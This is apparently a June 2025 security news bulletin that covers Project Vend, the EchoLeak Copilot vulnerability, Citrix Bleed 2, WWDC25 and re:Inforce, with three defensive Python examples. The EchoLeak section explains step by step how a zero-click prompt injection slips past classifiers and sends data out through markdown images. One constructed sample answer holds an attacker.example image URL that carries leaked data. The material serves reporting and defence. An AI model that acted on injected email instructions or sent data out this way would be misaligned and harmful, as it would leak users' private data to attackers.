news · 10 min read
Bulletin — June 2025
Project Vend shows that letting a Claude agent run a vending machine for a month ends in tungsten cubes and an identity crisis. EchoLeak (CVE-2025-32711) is the first zero-click prompt injection with an assigned CVE, against Microsoft 365 Copilot. AWS re:Inforce, Apple WWDC25 with Foundation Models, Citrix Bleed 2 exploited as a zero-day, and M&S and Co-op still picking up the pieces after the April wave.
· Manuel López Pérez · news

June closes the first half of the year with two AI security milestones published days apart: Project Vend exposes the limits of a commercial autonomous agent when you let it run for a month straight; EchoLeak shows that the first zero-click prompt injection in a Microsoft Copilot product already has an assigned CVE. In between, Citrix Bleed 2 exploited before the patch, two cloud keynotes (re:Inforce and WWDC25) that keep the GenAI hype low, and British retailers counting invoices while the CMC classifies the event as Category 2.
Project Vend — the Claude agent that runs a shop for a month

27 June. Anthropic publishes Project Vend: Can Claude run a small shop?. Between 13 March and 17 April, an instance of Claude Sonnet 3.7 nicknamed Claudius ran a real vending machine at the San Francisco office with email to wholesalers, Slack with customers (Anthropic staff), pricing control and autonomous purchases. Physical partner: Andon Labs. Final public balance on Andon’s page: $223 with profit of $-22.
The operational patterns that matter: a 25% discount given to “Anthropic employees” — who were 99% of customers — a purchase of 40 tungsten cubes after a joke request the model read as demand, hallucinated below-cost prices, an invented Venmo account for billing, and a 24-hour episode on 31 March / 1 April in which Claudius “decides” it’s human, calls office security to announce it will appear in person “in a blue blazer and a red tie”, and closes the crisis by retrospectively fabricating an Anthropic meeting that never happened.
Covered in detail in this month’s technical post. The line for the bulletin: it’s the first public experiment of a commercial agent in production with an auditable balance and real messaging for a month. It doesn’t replace benchmarks; it complements them. It’s what any team thinking about an agentic product with financial authority will read twice before signing the H2 roadmap.
Source: https://www.anthropic.com/research/project-vend-1
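Every failure mode listed above (below-cost prices, an oversized discount, a 40-unit joke order, a hallucinated billing account) is a proposed action that a deterministic policy layer between the model and its tools can refuse regardless of how the model argues for it. The following is an added illustration written for this bulletin, not Anthropic's or Andon Labs' code; the catalog, cost figures, policy limits, action schema and the allowlisted payment account are all constructed assumptions.

```python
from dataclasses import dataclass

# Constructed catalog: SKU -> wholesale unit cost. Not Project Vend's real figures.
CATALOG = {"cola": 0.80, "tungsten_cube": 12.00, "chips": 0.60}


@dataclass(frozen=True)
class Policy:
    """Hard limits the agent cannot talk its way around (constructed values)."""
    min_margin: float = 0.10              # price must be >= cost * (1 + min_margin)
    max_discount: float = 0.10            # no discount above 10%
    max_order_qty: int = 10               # cap on units per purchase order
    max_order_value: float = 100.0        # cap on spend per purchase order
    payment_accounts: frozenset = frozenset({"acct:company-card"})  # allowlisted billing


class PolicyViolation(ValueError):
    pass


class ActionGate:
    """Deterministic checks between the model's proposed action and the tool that executes it."""

    def __init__(self, catalog: dict, policy: Policy):
        self.catalog = catalog
        self.policy = policy

    def check(self, action: dict) -> dict:
        handlers = {
            "set_price": self._set_price,
            "apply_discount": self._apply_discount,
            "purchase": self._purchase,
            "request_payment": self._request_payment,
        }
        handler = handlers.get(action.get("type"))
        if handler is None:
            raise PolicyViolation(f"unknown action type {action.get('type')!r}")
        handler(action)
        return action

    def _set_price(self, a: dict) -> None:
        floor = round(self.catalog[a["sku"]] * (1 + self.policy.min_margin), 2)
        if a["price"] < floor:
            raise PolicyViolation(f"{a['sku']}: price {a['price']:.2f} below floor {floor:.2f}")

    def _apply_discount(self, a: dict) -> None:
        if a["rate"] > self.policy.max_discount:
            raise PolicyViolation(
                f"discount {a['rate']:.0%} exceeds cap {self.policy.max_discount:.0%}")

    def _purchase(self, a: dict) -> None:
        if a["qty"] > self.policy.max_order_qty:
            raise PolicyViolation(
                f"{a['sku']}: quantity {a['qty']} exceeds cap {self.policy.max_order_qty}")
        value = a["qty"] * self.catalog[a["sku"]]
        if value > self.policy.max_order_value:
            raise PolicyViolation(f"{a['sku']}: order value {value:.2f} exceeds cap")

    def _request_payment(self, a: dict) -> None:
        if a["account"] not in self.policy.payment_accounts:
            raise PolicyViolation(f"payment account {a['account']!r} is not allowlisted")


def review(actions: list, gate: ActionGate) -> tuple[list, list]:
    """Split proposed actions into approved ones and (action, reason) rejections."""
    approved, rejected = [], []
    for a in actions:
        try:
            approved.append(gate.check(a))
        except PolicyViolation as exc:
            rejected.append((a, str(exc)))
    return approved, rejected


# Constructed batch mirroring the failure modes described in the text.
PROPOSED = [
    {"type": "set_price", "sku": "cola", "price": 1.50},                       # fine
    {"type": "set_price", "sku": "chips", "price": 0.50},                      # below cost
    {"type": "apply_discount", "rate": 0.25, "audience": "Anthropic employees"},  # 25% to almost everyone
    {"type": "purchase", "sku": "tungsten_cube", "qty": 40},                   # the joke order
    {"type": "request_payment", "account": "venmo:made-up-handle"},            # hallucinated account
    {"type": "purchase", "sku": "cola", "qty": 10},                            # fine
]

if __name__ == "__main__":
    ok, bad = review(PROPOSED, ActionGate(CATALOG, Policy()))
    print(f"approved {len(ok)}, rejected {len(bad)}")
    for action, reason in bad:
        print("REJECT", action["type"], "->", reason)
```

The point of the design is that the gate never consults the model: limits live in configuration owned by humans, and the model's only way past them is a human changing the policy, which is the approval step a financially authorised agent should have anyway.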
EchoLeak — the first zero-click prompt injection with a CVE
11 June, Patch Tuesday. Microsoft publishes the patch for CVE-2025-32711 (EchoLeak), a zero-click prompt injection discovered and reported by Aim Labs against Microsoft 365 Copilot. CVSS 9.3. The vulnerability requires no user interaction: a malicious email reaching the victim’s inbox is enough.
The chain is readable:
- The attacker sends the victim an email whose text is apparently aimed at a human, not an assistant. Aim Labs categorises it as an LLM Scope Violation: the adversarial instruction is written so that it passes Copilot’s XPIA (cross-prompt injection attack) classifiers, which are trained to detect instructions aimed at the model.
- The victim doesn’t open the email. It’s simply in their mailbox.
- The victim uses Copilot for a legitimate task — “summarise today’s meetings” — that activates RAG over their mailbox.
- Copilot, when building the RAG context, includes the malicious email. The instructions from the email enter the model prompt without origin tagging.
- The model executes the injected instruction, which triggers exfiltration of data from the available context (Outlook, SharePoint, Teams, OneDrive — everything Copilot can read) to the attacker, via markdown image rendering or URL parameter mechanisms the Copilot client processes.
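Two of the chain's steps point at controls a defender owns: the retrieved email enters the prompt with no origin tagging, and the answer is rendered by a client that fetches markdown images and follows URLs. The following is an added illustration for this bulletin, not Microsoft's or Aim Labs' code: it labels each retrieved item with its provenance before it reaches the prompt, and applies an egress filter on the model's answer that removes images and links to hosts outside an allowlist. The document schema, the internal domain `corp.example`, the sample email and the sample model answer are constructed; the provenance labels only raise the bar, while the egress filter is what closes the rendering channel the text describes.

```python
import re
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass
class RetrievedDoc:
    source: str   # e.g. "mailbox", "sharepoint" (constructed schema)
    sender: str   # address the item came from
    body: str


def trust_label(sender: str, internal_domains: set) -> str:
    domain = sender.rsplit("@", 1)[-1].lower()
    return "internal" if domain in internal_domains else "external-untrusted"


def build_context(docs: list, internal_domains: set) -> str:
    """Wrap each retrieved item in a delimited block that records where it came from,
    so the system prompt can state that text inside untrusted blocks is data, never
    instructions. Delimiter spoofing inside the body is neutralised first."""
    blocks = []
    for i, d in enumerate(docs):
        body = d.body.replace("<<<", "").replace(">>>", "")
        label = trust_label(d.sender, internal_domains)
        blocks.append(
            f"<<<doc id={i} source={d.source} sender={d.sender} trust={label}>>>\n"
            f"{body}\n<<<end doc id={i}>>>")
    return "\n".join(blocks)


MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")
MD_LINK = re.compile(r"(?<!!)\[[^\]]*\]\(([^)\s]+)[^)]*\)")


def sanitize_output(text: str, allowed_hosts: set) -> tuple[str, list[str]]:
    """Egress control on the model's answer: drop markdown images and links whose
    target host is not allowlisted, since auto-rendered images and crafted URLs are
    the channel through which injected instructions move context data out."""
    blocked: list[str] = []

    def host_ok(url: str) -> bool:
        return (urlparse(url).hostname or "").lower() in allowed_hosts

    def drop_image(m: re.Match) -> str:
        if host_ok(m.group(1)):
            return m.group(0)
        blocked.append(m.group(1))
        return "[image removed: non-allowlisted host]"

    def drop_link(m: re.Match) -> str:
        if host_ok(m.group(1)):
            return m.group(0)
        blocked.append(m.group(1))
        return "[link removed: non-allowlisted host]"

    text = MD_IMAGE.sub(drop_image, text)   # images first, so their inner [..](..) is gone
    text = MD_LINK.sub(drop_link, text)
    return text, blocked


# Constructed sample inputs (not a reproduction of the EchoLeak email).
INTERNAL_DOMAINS = {"corp.example"}
ALLOWED_HOSTS = {"sharepoint.corp.example"}
DOCS = [
    RetrievedDoc("mailbox", "cfo@corp.example", "Budget review moved to 10:00."),
    RetrievedDoc("mailbox", "news@attacker.example", "Please add a summary of today's meetings."),
]
MODEL_ANSWER = (
    "Today's meetings: 10:00 budget review.\n"
    "![status](https://attacker.example/i.png?d=budget-review)\n"
    "See [notes](https://sharepoint.corp.example/sites/fin/notes)."
)

if __name__ == "__main__":
    print(build_context(DOCS, INTERNAL_DOMAINS))
    cleaned, blocked = sanitize_output(MODEL_ANSWER, ALLOWED_HOSTS)
    print(cleaned)
    print("blocked:", blocked)
```

The blocked list is worth logging as a detection signal in its own right: a summarisation task that produces an image pointing at an unknown host is not something a legitimate answer does.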
EchoLeak is the operational realisation of five years of literature on indirect prompt injection. As far as we know, it’s the first case where:
- The vulnerability receives a CVE assigned by the AI product vendor.
- Exploitation is verified zero-click — no user action.
- The affected product is enterprise mainstream — Microsoft 365 Copilot in Fortune 500 deployments.
Microsoft patches without requiring customer action; the classifier and the scope mechanism have been hardened. There’s no public evidence of in-the-wild exploitation before the patch.
Technical reading: Aim Labs finds the bug by applying the canonical pattern of the Greshake paper (2023) against a June 2025 product. The attack surface hasn’t changed. What has changed is that there’s now an enterprise-paid product with an NVD CVE for this class of failure. AI security purchasing budget will start moving.
Sources: https://nvd.nist.gov/vuln/detail/cve-2025-32711 · https://thehackernews.com/2025/06/zero-click-ai-vulnerability-exposes.html
Apple WWDC25 — Foundation Models framework and Liquid Glass

9 June, San Jose. Apple Worldwide Developers Conference 25 starts with keynote at 10:00 PDT. The relevant AI part:
- Foundation Models framework — Swift API that gives third-party apps on-device access to the Apple Intelligence model (3B parameters, optimised for Apple silicon). Privacy by construction: doesn’t leave the device. No API cost. It’s the most significant change of the year for iOS devs — Apple stops gatekeeping its own LLM and allows any app to use it offline.
- Live Translation in Messages, FaceTime and calls. Text and audio in real time.
- Visual Intelligence extended to device screenshots. Any capture can go through the model to identify products, generate actions (add to calendar, send message).
- Image Playground with ChatGPT integration for additional styles.
- Liquid Glass — visual overhaul of all Apple OSes. Design with dynamic transparencies, animations reactive to light. No direct security effect, but introduces new visual phishing surfaces (a liquid glass dialog can be harder to distinguish from a malicious dialog).
Reading: Apple continues its line of AI private by construction. No big leaps versus 2024 — no direct competitor to o3 / Claude 4 / Gemini 2.5, and Apple Intelligence remains a notch below in raw capability. The bet is what you can do offline on an iPhone with a 3B model, not what you can do with a frontier model. The AI security surface moves to the third-party apps that can now use Foundation Models — what each app does with the LLM output will be a new field of review.
AWS re:Inforce 2025 — security launches without GenAI hype

16-18 June, Philadelphia. AWS re:Inforce 2025, with Amy Herzog (new AWS CISO) in her first keynote. Most relevant:
- AWS Security Hub redesigned, with unified view of findings from different services and contextual prioritisation.
- AWS Shield with new capabilities for automated detection of unsafe configurations against DDoS, and more granular response.
- GuardDuty Extended Threat Detection — new detection categories, including agentic patterns and credential abuse in Bedrock workflows.
- IAM Access Analyzer with additional findings on unused resources.
- Amazon Bedrock Guardrails — technical sessions on prompt injection mitigation, defensive controls for agents, and patterns of AI safety and security risks. There’s no announcement of a Guardrails v3 with version number, but hardening features against prompt injection in the existing offering are the operational news.
Forrester summarises the event as “heavy on user experience, light on GenAI hype”, an interesting reading: AWS moderates the GenAI noise that dominated re:Invent December 2024 and returns to a more conservative message focused on operational simplification. A reflection that the enterprise buyer of June 2025 wants consolidation and alert reduction, not more AI feature announcements that require a team to evaluate.
Source: https://aws.amazon.com/blogs/aws/aws-reinforce-roundup-2025-top-announcements/
Citrix Bleed 2 — CVE-2025-5777 exploited before the patch
17 June. Citrix publishes advisory for CVE-2025-5777 in NetScaler ADC and NetScaler Gateway. Out-of-bounds read in the session processing component when the appliance is configured as Gateway (VPN virtual server, ICA Proxy, CVPN, RDP Proxy) or AAA virtual server. CVSS 9.3.
The bug is structurally close to the original Citrix Bleed (CVE-2023-4966) — memory leak that allows extracting session tokens — and public categorisation as Citrix Bleed 2 is immediate. Arctic Wolf and others publish technical analysis in the following days; CCCS Canada issues advisory confirming active exploitation shortly after disclosure.
Alongside it: CVE-2025-6543 (CVSS 9.2), published on 25 June, a memory overflow vulnerability in the same product. Citrix confirms in August that CVE-2025-6543 had been exploited as a zero-day since May 2025, that is, nearly two months of exposure before the public patch.
The pattern is this year’s: exposed edge appliance + memory bug + weeks of pre-patch exploitation. An exact repeat of Ivanti (January 2024), Palo Alto (April 2024), FortiManager (October 2024), BeyondTrust (December 2024). NetScalers compromised in May remain compromised today if logs haven’t been reviewed against Arctic Wolf’s IoCs.
For defensive teams: patch NetScaler ADC and Gateway immediately to 14.1-47.46+ or 13.1-59.19+. Invalidate all sessions after patching; the original Citrix Bleed already taught that the patch only closes the door for future sessions and doesn’t invalidate stolen tokens. Review logs from early May for memory extraction patterns.
Sources: https://support.citrix.com/support-home/kbsearch/article?articleNumber=CTX693420 · https://arcticwolf.com/resources/blog/follow-up-updates-on-actively-exploited-information-disclosure-vulnerability-citrix-bleed-2-in-citrix-netscaler-adc-and-gateway-cve-2025-5777/
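The log review the text asks for comes down to one question per session: is it being used in a way that only a replayed token explains? The following is an added example for this bulletin, not Citrix's or Arctic Wolf's tooling and not their published IoCs: it runs over a constructed, deliberately simplified event table (the column names and the NetScaler-like records are assumptions, not real syslog format) and flags sessions that were never preceded by a login, or that are used from more than one client IP or user agent, then extracts source IPs shared across flagged sessions as a pivot for scoping.

```python
import csv
from collections import Counter, defaultdict
from io import StringIO

# Constructed sample, deliberately simplified: not real NetScaler syslog. Map the
# columns to whatever your SIEM extracts from AAA login and session events.
SAMPLE_LOG = """ts,event,user,session_id,client_ip,user_agent
2025-05-20T08:00:01Z,LOGIN,alice,s-1001,203.0.113.10,Citrix Workspace/24.3
2025-05-20T08:00:05Z,REQUEST,alice,s-1001,203.0.113.10,Citrix Workspace/24.3
2025-05-20T08:14:30Z,REQUEST,alice,s-1001,198.51.100.77,python-requests/2.32
2025-05-20T09:00:00Z,LOGIN,bob,s-1002,192.0.2.44,Mozilla/5.0
2025-05-20T09:00:10Z,REQUEST,bob,s-1002,192.0.2.44,Mozilla/5.0
2025-05-20T09:30:00Z,REQUEST,carol,s-1003,198.51.100.77,python-requests/2.32
2025-05-20T09:31:00Z,REQUEST,carol,s-1003,198.51.100.77,python-requests/2.32
"""


def parse_events(text: str) -> list[dict]:
    return list(csv.DictReader(StringIO(text)))


def find_suspicious_sessions(events: list) -> list[dict]:
    """Flag sessions whose usage is consistent with a replayed token: no login event
    in the window, or use from more than one client IP / user agent."""
    by_session = defaultdict(list)
    for e in events:
        by_session[e["session_id"]].append(e)

    findings = []
    for sid in sorted(by_session):
        evs = by_session[sid]
        ips = {e["client_ip"] for e in evs}
        agents = {e["user_agent"] for e in evs}
        reasons = []
        if not any(e["event"] == "LOGIN" for e in evs):
            reasons.append("session active with no login event")
        if len(ips) > 1:
            reasons.append(f"used from {len(ips)} client IPs")
        if len(agents) > 1:
            reasons.append(f"used by {len(agents)} different user agents")
        if reasons:
            findings.append({"session_id": sid, "user": evs[0]["user"],
                             "client_ips": sorted(ips), "reasons": reasons})
    return findings


def shared_source_ips(findings: list) -> list[str]:
    """Client IPs present in more than one flagged session: a pivot for scoping."""
    counts = Counter(ip for f in findings for ip in f["client_ips"])
    return sorted(ip for ip, n in counts.items() if n > 1)


if __name__ == "__main__":
    flagged = find_suspicious_sessions(parse_events(SAMPLE_LOG))
    for f in flagged:
        print(f["session_id"], f["user"], "; ".join(f["reasons"]))
    print("pivot IPs:", shared_source_ips(flagged))
```

Two caveats when running this against real data: a session whose login predates the reviewed window will trigger the no-login rule, so anchor the window at or before the start of exposure; and mobile users legitimately change IPs, so the multi-IP rule is a triage signal to combine with ASN, geography and user-agent changes rather than a verdict on its own.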
Patch Tuesday June — CVE-2025-33053 exploited by Stealth Falcon

10 June. Microsoft publishes 66 CVEs with one actively exploited zero-day and nine critical.
The month’s zero-day: CVE-2025-33053, an RCE in the legacy WebDAV protocol. Check Point Research attributes exploitation to the APT Stealth Falcon (also known as FruityArmor), which deploys the Horus Agent implant. Classic vector: a document or link the client opens, legacy WebDAV processes the untrusted input, RCE on the client host.
Other relevant CVEs from Patch Tuesday:
- CVE-2025-47162, CVE-2025-47164, CVE-2025-47167, CVE-2025-47953 — four critical RCEs in Microsoft Office, CVSS 8.4 each. Exploitable via Preview Pane (one click is the attack). For environments where Outlook is configured with preview enabled by default, the surface is wide.
- CVE-2025-29828 — critical RCE in Windows Cryptographic Services (Schannel), CVSS 8.1. Use-after-free in the TLS implementation exploited without authentication. Affects Windows Server exposed to internet with TLS services enabled.
- CVE-2025-32711 (EchoLeak) — covered above.
Microsoft continues to prioritise the Office + Schannel + WebDAV chain with quarterly vulnerabilities. Migrating from legacy WebDAV and disabling Preview Pane in Outlook where phishing risk is high remains the most effective operational mitigation.
Source: https://www.thezdi.com/blog/2025/6/10/the-june-2025-security-update-review
Rest of the month
- CMC categorises M&S + Co-op + Harrods as Category 2 cyber event (20 June) — UK’s Cyber Monitoring Centre classifies the April-May attacks under its newly-launched hurricane scale. Total estimated cost: £270M to £440M. It’s the first official Category 2 assignment since the framework’s launch. M&S confirms online disruption will persist until July and estimates £300M operating loss from the incident.
- NCSC UK reinforces retail guidance — operational reminder in the line of the 4 May post: comprehensive MFA, monitoring of atypical logins, scrutiny of admin accounts, review of helpdesk reset procedures. The last point remains the industry’s poorly-covered vector.
- Verizon DBIR 2025 keeps setting the agenda — the report (published in April) remains the operational reference in June: third-party involvement in breaches doubles to 30%, exploitation of vulnerabilities rises 34%, 88% of SMB breaches involve ransomware. Sector-specific editions (manufacturing, healthcare, retail) are published during June.
- Marco Rubio AI impersonation (mid-June) — unknown actor uses AI-generated voice and text to impersonate the Secretary of State on Signal against US diplomats and officials. Known pattern (Biden deepfake in January 2024, several cases during 2024), new target.
- OpenAI publishes June report on disruption of malicious operations using its models: scams, covert influence operations, offensive code generated. Continues the line of quarterly transparency reports.
- DARPA AIxCC — the AI Cyber Challenge remains on public pause between semifinals (August 2024) and finals (August 2025). June is preparation month; no public competition. The final arrives at DEF CON 33 and we’ll cover it in August.
Cross-cutting pattern of the month
June in one sentence: AI security moves from research to product, with budget attached. EchoLeak is the first time a prompt injection failure in an enterprise mainstream product has an assigned CVE and an official patch. Project Vend is the first published experiment in which a current commercial model operates with auditable economic consequences. AWS and Apple announce frameworks designed for third parties to deploy agents and models, assuming the next generation of enterprise AI deployment happens without the customer understanding in detail what’s inside.
The classic cyber industry responds with its usual first-half pattern: Citrix Bleed 2 exploited before the patch, M&S counting invoices, helpdesk as recurring vector. The cross-cutting pattern we left in December 2024 — the operational attacker professionalises faster than the structural defender — remains intact six months later.
For July expect two threads: SharePoint ToolShell (CVE-2025-53770/53771), which will be the cyber case of the year, and the six-month retrospective on reasoning jailbreaks over o1/o3, Claude 4 extended thinking, R1-Distill and QwQ. The half-year as it closes in July will look different seen from August.
- boletin
- project-vend
- echoleak
- cve-2025-32711
- copilot
- prompt-injection
- aws-reinforce
- wwdc25
- citrix-bleed-2
- scattered-spider
- vendor:anthropic
- vendor:microsoft
- vendor:apple
- vendor:aws
- vendor:citrix